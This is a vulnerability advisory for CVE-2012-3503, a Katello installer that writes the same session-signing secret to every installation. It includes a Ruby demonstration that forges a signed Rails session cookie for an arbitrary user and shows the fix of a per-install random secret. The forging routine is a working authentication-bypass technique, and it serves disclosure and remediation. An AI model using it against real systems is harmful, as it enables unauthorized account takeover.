PT-2012-4767 · Red Hat · Katello
Lzap · Published 2012-08-25 · Updated 2024-02-13
CVE-2012-3503
CVSS v3.1: 9.8 (Critical)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions
Katello versions 1.0 and earlier
Description
The installation script does not generate a per-installation Application.config.secret token; every default installation ends up with the same value. Because the web session cookie is signed with that token, a remote attacker who knows it can craft a cookie naming any user and authenticate to the CloudForms System Engine web interface as that user, without supplying credentials.
Recommendations
For Katello versions 1.0 and earlier, replace the shared Application.config.secret token on every installation with a unique, cryptographically random value (the output of rake secret, for example) and restart the application. Rotating the token invalidates every existing session cookie, which is desirable here because any of them may have been forged. Until that is done, restrict network access to the CloudForms System Engine web interface to trusted hosts as a temporary workaround.
Exploit
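The page gives no exploit or fix details, so the script below is an added example, not Katello's or Red Hat's code. It models the Rails 3 CookieStore format that Katello 1.0 used (Base64 of a Marshal-dumped session hash, "--", hex HMAC-SHA1 under the application secret) in plain Ruby, then shows that a client who knows the shared secret can mint a cookie for an arbitrary user that the server accepts, and that the same cookie is rejected once the installation has its own randomly generated secret. DEFAULT_SECRET is a constructed placeholder, not the real Katello token; the session key user_id and the choice of user id 1 are assumptions for illustration.

```ruby
require 'openssl'
require 'base64'
require 'securerandom'

# Cookie layout modelled on the Rails 3 CookieStore:
#   Base64(Marshal.dump(session_hash)) + "--" + hex(HMAC-SHA1(secret, payload))
# The server trusts any cookie whose MAC verifies under its secret, so the
# secret is the only thing standing between a client and an arbitrary session.

# Constructed placeholder for the token the installer wrote identically to
# every default install. The real value is deliberately not reproduced.
DEFAULT_SECRET = 'constructed-placeholder-identical-on-every-install'.freeze

def sign(secret, payload)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, payload)
end

# Constant-time comparison so the MAC check does not leak bytes via timing.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# What the application does when it sets a session cookie.
def build_session_cookie(secret, session)
  payload = Base64.strict_encode64(Marshal.dump(session))
  "#{payload}--#{sign(secret, payload)}"
end

# What the application does on every request: verify first, deserialize only
# after the MAC checks out. Returns the session hash, or nil if the cookie was
# not signed with `secret`.
def verify_session_cookie(secret, cookie)
  payload, mac = cookie.to_s.split('--', 2)
  return nil if payload.nil? || mac.nil?
  return nil unless secure_equal?(mac, sign(secret, payload))
  Marshal.load(Base64.strict_decode64(payload))
rescue ArgumentError, TypeError
  nil
end

# Attacker side: with the shared secret in hand there is nothing to guess.
# The session key 'user_id' and user id 1 (assumed to be an administrator)
# are assumptions for this example.
def forge_cookie(secret, user_id)
  build_session_cookie(secret, { 'user_id' => user_id })
end

# Fix: every installation generates its own secret from a CSPRNG.
# SecureRandom.hex(64) is what `rake secret` produces.
def generate_unique_secret
  SecureRandom.hex(64)
end

def demo
  forged = forge_cookie(DEFAULT_SECRET, 1)
  {
    vulnerable_install: verify_session_cookie(DEFAULT_SECRET, forged),
    fixed_install: verify_session_cookie(generate_unique_secret, forged)
  }
end

if __FILE__ == $PROGRAM_NAME
  result = demo
  puts "shared default secret accepts forged cookie: #{result[:vulnerable_install].inspect}"
  puts "unique per-install secret accepts it:       #{result[:fixed_install].inspect}"
end
```

The forged cookie is indistinguishable from a genuine one to the vulnerable server because authenticity rests entirely on the secret; once each installation has its own secret, the attacker's cookie fails the MAC check and is never deserialized.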
Fix
Weakness Enumeration
Using Hardcoded Credentials
Related Identifiers
CVE-2012-3503
Affected Products
Katello